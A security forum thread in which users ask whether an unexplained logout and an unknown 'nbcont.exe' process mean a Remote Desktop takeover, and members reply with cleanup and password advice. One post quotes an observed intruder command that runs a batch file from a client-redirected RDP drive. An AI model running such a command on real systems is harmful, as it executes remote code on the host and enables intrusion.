Advice Request Computer takeover attempt?

Please provide comments and solutions that are helpful to the author of this topic.

Joe Jones

Thread author
Feb 15, 2018
When i sat down at my computer a few minutes ago, it had gone back to the login screen even though I did nothing to prompt it to. When i logged back in, I took a screen shot of what was there. I googled "nbcont.exe" nothing came up. I do use Remote desktop but haven't done so today. Was this a takeover attempt?

virus.JPG

WinXPert

Level 25
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
Jan 9, 2013
Doesn't look good

Things you can do
  • Install System Explorer
  • Enable Connections, History and Autoruns tab. Allow it to autostart with Windows
Reboot and check System Explorer on what's happening on your computer during startup

D

Deleted member 65228

OP isn't going to understand how to use diagnostic tools and check logs himself hence why he's here asking what is going on.

Click here to be redirected to the Malware Removal Assistance area; make sure to read the rules beforehand by clicking here and here.

You can create a thread there and post logs created using a utility instructions are left for using, quick and simple. If the staff member who moderates the area manages to find anything in the logs then he'll definitely help you assuming the rules are stuck to.

Even if nothing is found as long as you have doubts (and certainly if there is a clean-up required), you should re-install Windows at the least, or even go as far as formatting and then re-installing Windows to be on the safer-side. However when doing this, be cautious of backed up data - and remember to always keep a backup for situations like these.

I'd also suggest changing all your passwords and security question answers on a separate, clean device. You can also disconnect the network on the system in-question for the time being until the picture is painted a bit better - this will prevent a communication between any potential malicious code executing on the environment and the attacker (typically via a Command and Control (C&C)/backdoor functionality).

SJPLAY

Feb 28, 2018
When i sat down at my computer a few minutes ago, it had gone back to the login screen even though I did nothing to prompt it to. When i logged back in, I took a screen shot of what was there. I googled "nbcont.exe" nothing came up. I do use Remote desktop but haven't done so today. Was this a takeover attempt?

View attachment 180134
I had the exact same thing happen today. Same situation. Remote desktop into my server and I see this same cmd window with the same commands in it. When I go to the windows Run prompt I see the last command that was executed was "cmd.exe /C \\tsclient\R\a.bat <myPublicIP>.W && exit

Did you ever find out what this is/was?

AtlBo

Level 28
Verified
Top Poster
Content Creator
Well-known
Dec 29, 2014
Reactions: Sunshine-boy

About us

• MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

User Menu

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.